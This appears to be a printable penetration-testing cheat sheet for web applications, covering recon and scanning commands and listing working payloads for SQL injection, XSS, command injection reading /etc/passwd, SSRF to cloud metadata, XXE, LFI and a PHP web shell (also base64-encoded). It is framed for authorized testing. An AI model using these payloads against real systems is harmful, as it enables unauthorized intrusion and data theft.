Web App Pentest - Quick Reference Card

Subdomain Discovery

subfinder -d target.com -o subs.txt
httpx -l subs.txt -title -tech-detect -o live.txt

Technology Stack Fingerprinting

whatweb -v target.com
curl -I https://target.com

Content Discovery

ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,401,403

Google Dorking

site:target.com filetype:pdf
site:target.com inurl:admin
site:target.com ext:sql OR ext:env

PHASE 2: APPLICATION MAPPING (6-8 hours)

Manual Exploration Steps

Create an account on the application
Browse ALL features systematically
Intercept traffic with Burp Suite (127.0.0.1:8080)
Analyze JavaScript files for hidden endpoints
Find API documentation (/api, /swagger, /api-docs)

Automated Discovery

# Directory bruteforce
feroxbuster -u https://target.com -w wordlist.txt -x php,html,js

# JavaScript analysis
python3 linkfinder.py -i https://target.com/app.js -o cli

# Parameter discovery
arjun -u https://target.com/endpoint

PHASE 3: VULNERABILITY DISCOVERY (12-16 hours)

Authentication Testing

SQL Injection in Login Form

Username: admin' OR '1'='1' --
Password: anything

Default Credentials

admin:admin, root:root, test:test

JWT Token Testing

jwt_tool <TOKEN> -X k -pk public.pem

Authorization Testing

IDOR (Insecure Direct Object Reference)

# Your ID: 123, test accessing: 124, 125, 126...
GET /api/user/123/profile
GET /api/user/124/profile

# Try all HTTP methods
curl -X POST /api/user/124/profile
curl -X PUT /api/user/124/profile
curl -X DELETE /api/user/124/profile

Privilege Escalation

POST /api/user/update
{"role": "admin", "is_admin": true}

SQL Injection

Manual Payloads

# Basic
' OR '1'='1' --
' UNION SELECT NULL,NULL,NULL --

# Time-based blind
' AND SLEEP(5) --
' AND IF(1=1, SLEEP(5), 0) --

# Boolean-based
' AND 1=1 --  (True)
' AND 1=2 --  (False)

Automated Testing

sqlmap -u "https://target.com/page?id=1" --batch --dbs
sqlmap -r request.txt --batch --dbs --level=5 --risk=3

Test These Locations

URL parameters
POST body
JSON fields
HTTP headers (User-Agent, Referer, X-Forwarded-For)
Cookies

Cross-Site Scripting (XSS)

Basic Payloads

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<iframe src=javascript:alert(1)>

Filter Bypass Techniques

<ScRiPt>alert(1)</sCrIpT>
<body onload=alert(1)>
<svg/onload=alert(1)>

Test In

Search boxes
Comment fields
Profile fields (name, bio, etc.)
File upload (filename parameter)

Command Injection

; ls
| cat /etc/passwd
&& whoami
`id`
$(whoami)

# Blind (time-based)
; sleep 10
| ping -c 10 127.0.0.1

Server-Side Request Forgery (SSRF)

http://127.0.0.1
http://localhost
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/

# Bypass techniques
http://127.1
http://[::1]
http://127.0.0.1.nip.io

Test In

URL parameters
Image/avatar upload fields
Webhook configurations
PDF generation features
XML/SVG upload

XML External Entity (XXE)

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

File Upload Vulnerabilities

Malicious Files

# PHP shell
<?php system($_GET['cmd']); ?>

# With GIF header bypass
GIF89a<?php system($_GET['cmd']); ?>

# Extension bypass
shell.php.jpg
shell.php%00.jpg
shell.PhP

Path Traversal in Filename

../../shell.php
..%2F..%2Fshell.php

Local/Remote File Inclusion (LFI/RFI)

../../../../etc/passwd
../../../../var/log/apache2/access.log

# PHP wrappers
php://filter/convert.base64-encode/resource=index.php
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8+

Business Logic Vulnerabilities

Test For

Price manipulation (set to 0 or negative values)
Race conditions (concurrent requests)
Workflow bypass (skip payment/verification steps)
Parameter tampering

Race Condition Test Script

import concurrent.futures, requests

def req():
    return requests.post('https://target.com/redeem', 
                        data={'code': 'GIFT100'})

with concurrent.futures.ThreadPoolExecutor(max_workers=20) as ex:
    [ex.submit(req) for _ in range(20)]

API-Specific Testing

GraphQL Introspection

curl -X POST https://target.com/graphql \
  -H "Content-Type: application/json" \
  -d '{"query":"{ __schema { types { name } } }"}'

Mass Assignment

{"username": "test", "is_admin": true, "role": "admin"}

API Version Testing

curl https://target.com/api/v1/users
curl https://target.com/api/v2/users

QUICK WINS CHECKLIST (First 30 Minutes)

☐ Check /admin, /api, /swagger endpoints
☐ Try default credentials (admin:admin, root:root)
☐ Check for .git directory exposure (use git-dumper)
☐ Check for .env file exposure
☐ Test directory listing (/uploads/, /files/)
☐ Check robots.txt and sitemap.xml
☐ SQL injection in login (' OR '1'='1' --)
☐ IDOR testing on /api/user/{id}
☐ Reflected XSS in search functionality
☐ Check security headers (curl -I)

COMMON VULNERABLE PARAMETERS

BURP SUITE ESSENTIALS

Parameter	Vulnerability Type
?id=	SQL Injection, IDOR
?url=	SSRF
?file=	LFI/RFI
?page=	LFI
?redirect=	Open Redirect
?callback=	JSONP Hijacking
?email=	Email Header Injection
?search=	XSS, SQL Injection
?image=	SSRF
?template=	SSTI

Initial Setup

Proxy → Options → Configure listener: 127.0.0.1:8080
Import Burp CA certificate in browser
Enable Intercept
Browse application, monitor HTTP History

Key Features

Repeater: Modify & resend requests (Ctrl+R)
Intruder: Automated attack campaigns
Sequencer: Analyze token randomness
Decoder: Encode/decode data
Comparer: Compare responses side-by-side

SEVERITY RATING (CVSS v3)

PROOF OF CONCEPT TEMPLATE

TOOL QUICK COMMANDS

Severity	Score	Examples
CRITICAL	9.0-10.0	Unauthenticated RCE, SQL injection with admin access, Authentication bypass
HIGH	7.0-8.9	Authenticated RCE, Privilege escalation, Sensitive data exposure
MEDIUM	4.0-6.9	IDOR, Stored XSS, CSRF on sensitive functions
LOW	0.1-3.9	Information disclosure, Missing security headers, Reflected XSS (limited impact)

Nuclei

nuclei -u https://target.com -tags cve,exposure
nuclei -l urls.txt -c 50

SQLMap

sqlmap -u "URL" --batch --dbs
sqlmap -r request.txt --level=5 --risk=3

FFUF

ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302
ffuf -u https://target.com/api/FUZZ -w api-wordlist.txt -H "Authorization: Bearer TOKEN"

cURL

curl -I https://target.com  # Headers only
curl -X POST https://target.com/api -d '{"key":"value"}'
curl -H "Authorization: Bearer TOKEN" https://target.com/api

COMPREHENSIVE TEST CHECKLIST

☐ All user roles (admin, regular user, guest)
☐ All HTTP methods (GET, POST, PUT, DELETE, PATCH, OPTIONS)
☐ All API versions (v1, v2, v3)
☐ All input fields (forms, JSON, XML, headers, cookies)
☐ Mobile API endpoints
☐ Older subdomains (dev, staging, old, v1, v2)
☐ Different content types (JSON, XML, form-data)
☐ Error messages (check for verbose errors)
☐ Password reset flow
☐ Registration flow
☐ OAuth/SSO authentication flows

PROFESSIONAL TESTING TIPS

✓ Document findings as you go (don't wait until end)
✓ Take screenshots immediately when finding issues
✓ Copy HTTP requests for proof of concept
✓ Set timers for each testing phase
✓ Take regular breaks to stay sharp
✓ Notify client immediately of critical findings
✓ Test methodically, don't skip steps
✓ Use both automated AND manual testing
✓ Think like an attacker AND a developer
✓ Read source code if available

EMERGENCY STOP CONDITIONS

STOP TESTING IMMEDIATELY IF:

❌ You access production databases with real data
❌ You find PII/sensitive customer data
❌ You achieve remote code execution
❌ You're affecting system availability
❌ You're unsure if target is in scope

THEN:

Document exactly what you found
Stop testing that specific vector
Notify client immediately
Get explicit guidance before continuing

TIME MANAGEMENT

REPORTING CHECKLIST

Engagement Type	Time Allocation
40-Hour Engagement	Day 1: Recon + Mapping (8h) Day 2: Auth + Authz testing (8h) Day 3: Injection vulnerabilities (8h) Day 4: Business logic + APIs (8h) Day 5: Exploitation + Reporting (8h)
8-Hour Quick Test	0-1h: Reconnaissance 1-3h: Manual exploration 3-6h: Vulnerability testing (high-impact focus) 6-8h: Documentation

☐ Executive summary (non-technical language)
☐ Scope definition
☐ Methodology description
☐ Findings organized by severity
☐ Detailed reproduction steps for each finding
☐ Proof of concept code/commands
☐ Screenshots and evidence
☐ Remediation recommendations
☐ CVSS scores for each vulnerability
☐ References (OWASP, CWE links)
☐ Testing timeline
☐ Tools used

WHEN YOU'RE STUCK

1. Change Your Testing Angle

Test with different user role
Try different HTTP method
Use different parameter encoding

2. Review Your Notes

Did you miss any endpoints?
Any interesting headers observed?
Unusual application behavior?

3. Analyze JavaScript Code

Look for hidden API endpoints
Check if client-side validation only
Search for hardcoded secrets

4. Test Business Logic

What's the INTENDED workflow?
Can you skip verification steps?
Can you manipulate the process order?

5. Ask for Help

Client questions are acceptable
Request peer review
Consult security community

FINAL CRITICAL REMINDER

This is REAL TESTING with REAL CONSEQUENCES

✓ Get WRITTEN AUTHORIZATION FIRST

✓ Define clear scope boundaries

✓ Maintain professional communication

✓ Document EVERYTHING

✓ Demonstrate ethical behavior

✓ Stop immediately if unsure

✓ Notify client of critical findings

Your professional reputation is on the line.
Test responsibly and ethically.

Print this reference card.

Keep it next to your monitor.

Reference it constantly during testing.

Now go find those bugs! 🎯

Web Application Penetration Testing

PHASE 1: RECONNAISSANCE (4-6 hours)

Subdomain Discovery

Technology Stack Fingerprinting

Content Discovery

Google Dorking

PHASE 2: APPLICATION MAPPING (6-8 hours)

Manual Exploration Steps

Automated Discovery

PHASE 3: VULNERABILITY DISCOVERY (12-16 hours)

Authentication Testing

SQL Injection in Login Form

Default Credentials

JWT Token Testing

Authorization Testing

IDOR (Insecure Direct Object Reference)

Privilege Escalation

SQL Injection

Manual Payloads

Automated Testing

Test These Locations

Cross-Site Scripting (XSS)

Basic Payloads

Filter Bypass Techniques

Test In

Command Injection

Server-Side Request Forgery (SSRF)

Test In

XML External Entity (XXE)

File Upload Vulnerabilities

Malicious Files

Path Traversal in Filename

Local/Remote File Inclusion (LFI/RFI)

Business Logic Vulnerabilities

Test For

Race Condition Test Script

API-Specific Testing

GraphQL Introspection

Mass Assignment

API Version Testing

QUICK WINS CHECKLIST (First 30 Minutes)

COMMON VULNERABLE PARAMETERS

BURP SUITE ESSENTIALS

Initial Setup

Key Features

Essential Extensions

SEVERITY RATING (CVSS v3)

PROOF OF CONCEPT TEMPLATE

TOOL QUICK COMMANDS

Nuclei

SQLMap

FFUF

cURL

COMPREHENSIVE TEST CHECKLIST

PROFESSIONAL TESTING TIPS

EMERGENCY STOP CONDITIONS

STOP TESTING IMMEDIATELY IF:

THEN:

TIME MANAGEMENT

REPORTING CHECKLIST

WHEN YOU'RE STUCK

1. Change Your Testing Angle

2. Review Your Notes

3. Analyze JavaScript Code

4. Test Business Logic

5. Ask for Help

FINAL CRITICAL REMINDER

This is REAL TESTING with REAL CONSEQUENCES